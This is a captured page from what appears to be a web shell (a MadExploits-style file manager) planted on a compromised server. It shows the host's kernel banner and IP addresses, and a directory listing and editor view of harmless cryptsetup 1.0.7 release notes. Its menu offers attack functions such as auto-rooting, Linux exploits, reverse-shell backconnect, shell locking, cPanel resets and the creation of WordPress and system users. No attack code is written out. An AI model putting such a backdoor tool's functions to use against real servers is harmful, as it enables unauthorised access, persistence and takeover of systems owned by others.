Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
cryptsetup /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
137
B
-rw-r--r--
FAQ
131.18
KB
-rw-r--r--
v1.0.7-ReleaseNotes
2.85
KB
-rw-r--r--
v1.1.0-ReleaseNotes
4.92
KB
-rw-r--r--
v1.1.1-ReleaseNotes
1.75
KB
-rw-r--r--
v1.1.2-ReleaseNotes
1.56
KB
-rw-r--r--
v1.1.3-ReleaseNotes
482
B
-rw-r--r--
v1.2.0-ReleaseNotes
4.74
KB
-rw-r--r--
v1.3.0-ReleaseNotes
4.64
KB
-rw-r--r--
v1.3.1-ReleaseNotes
421
B
-rw-r--r--
v1.4.0-ReleaseNotes
5.19
KB
-rw-r--r--
v1.4.1-ReleaseNotes
889
B
-rw-r--r--
v1.4.2-ReleaseNotes
1.59
KB
-rw-r--r--
v1.4.3-ReleaseNotes
2.3
KB
-rw-r--r--
v1.5.0-ReleaseNotes
8.41
KB
-rw-r--r--
v1.5.1-ReleaseNotes
1.26
KB
-rw-r--r--
v1.6.0-ReleaseNotes
9.31
KB
-rw-r--r--
v1.6.1-ReleaseNotes
1.02
KB
-rw-r--r--
v1.6.2-ReleaseNotes
985
B
-rw-r--r--
v1.6.3-ReleaseNotes
1.82
KB
-rw-r--r--
v1.6.4-ReleaseNotes
1.99
KB
-rw-r--r--
v1.6.5-ReleaseNotes
2.42
KB
-rw-r--r--
v1.6.6-ReleaseNotes
1.07
KB
-rw-r--r--
v1.6.7-ReleaseNotes
3.25
KB
-rw-r--r--
v1.6.8-ReleaseNotes
2.01
KB
-rw-r--r--
v1.7.0-ReleaseNotes
3.03
KB
-rw-r--r--
v1.7.1-ReleaseNotes
1.34
KB
-rw-r--r--
v1.7.2-ReleaseNotes
1.45
KB
-rw-r--r--
v1.7.3-ReleaseNotes
811
B
-rw-r--r--
v1.7.4-ReleaseNotes
657
B
-rw-r--r--
v1.7.5-ReleaseNotes
833
B
-rw-r--r--
v2.0.0-ReleaseNotes
26
KB
-rw-r--r--
v2.0.1-ReleaseNotes
4.75
KB
-rw-r--r--
v2.0.2-ReleaseNotes
4.07
KB
-rw-r--r--
v2.0.3-ReleaseNotes
5.21
KB
-rw-r--r--
v2.0.4-ReleaseNotes
4.9
KB
-rw-r--r--
v2.0.5-ReleaseNotes
4.3
KB
-rw-r--r--
v2.0.6-ReleaseNotes
4.16
KB
-rw-r--r--
v2.1.0-ReleaseNotes
8.68
KB
-rw-r--r--
v2.2.0-ReleaseNotes
11.61
KB
-rw-r--r--
v2.2.1-ReleaseNotes
1.38
KB
-rw-r--r--
v2.2.2-ReleaseNotes
2.1
KB
-rw-r--r--
v2.3.0-ReleaseNotes
7.79
KB
-rw-r--r--
v2.3.1-ReleaseNotes
1.73
KB
-rw-r--r--
v2.3.2-ReleaseNotes
1.46
KB
-rw-r--r--
v2.3.3-ReleaseNotes
1.36
KB
-rw-r--r--
v2.3.4-ReleaseNotes
4.33
KB
-rw-r--r--
v2.3.5-ReleaseNotes
7.25
KB
-rw-r--r--
v2.3.6-ReleaseNotes
2.26
KB
-rw-r--r--
v2.3.7-ReleaseNotes
4.42
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : v1.0.7-ReleaseNotes
cryptsetup 1.0.7 Release Notes (2009-07-22) =========================================== Changes since 1.0.7-rc1 ------------------------ [committer name] * Allow removal of last slot in luksRemoveKey and luksKillSlot. [Milan Broz] * Add --disable-selinux option and fix static build if selinux is required. [Milan Broz] * Reject unsupported --offset and --skip options for luksFormat and update man page. [Milan Broz] Changes since 1.0.6 -------------------- [committer name] * Various man page fixes. Also merged some Debian/Ubuntu man page fixes. (thanks to Martin Pitt) [Milan Broz] * Set UUID in device-mapper for LUKS devices. [Milan Broz] * Retain readahead of underlying device. [Milan Broz] * Display device name when asking for password. (thanks to Till Maas) [Milan Broz] * Check device size when loading LUKS header. Remove misleading error message later. [Milan Broz] * Add error hint if dm-crypt mapping failed. (Key size and kernel version check for XTS and LRW mode for now.) [Milan Broz] * Use better error messages if device doesn't exist or is already used by other mapping. [Milan Broz] * Fix make distcheck. (thanks to Mike Kelly) [Milan Broz] * Check if all slots are full during luksAddKey. [Clemens Fruhwirth] * Fix segfault in set_error (thanks to Oliver Metz). [Clemens Fruhwirth] * Remove precompiled pot files. Fix uninitialized return value variable in setup.c. [Clemens Fruhwirth] * Code cleanups. (thanks to Ivan Stankovic) [Clemens Fruhwirth] * Remove unnecessary files from po directory. They will be regenerated by autogen.sh. [Clemens Fruhwirth] * Fix wrong output for remaining key at key deletion. Allow deletion of key slot while other keys have the same key information. [Clemens Fruhwirth] * Add missing AM_PROG_CC_C_O to configure.in [Milan Broz] * Remove duplicate sentence in man page (thanks to Till Maas). [Milan Broz] * Wipe start of device (possible fs signature) before LUKS-formatting. [Milan Broz] * Do not process configure.in in hidden directories. [Milan Broz] * Return more descriptive error in case of IO or header format error. [Milan Broz] * Use remapping to error target instead of calling udevsettle for temporary crypt device. [Milan Broz] * Check device mapper communication and warn user in case the communication fails. (thanks to Milan Broz) [Clemens Fruhwirth] * Fix signal handler to proper close device. (thanks to Milan Broz) [Clemens Fruhwirth] * write_lseek_blockwise: declare innerCount outside the if block, add -Wall to the default CFLAGS, * fix some signedness issues (thanks to Ivan Stankovic) [Clemens Fruhwirth] * Error handling improvement. (thanks to Erik Edin) [Clemens Fruhwirth] * Add non-exclusive override to interface definition. [Clemens Fruhwirth] * Refactor key slot selection into keyslot_from_option. Either autoselect next free keyslot or honor user choice (after checking). [Clemens Fruhwirth]
Close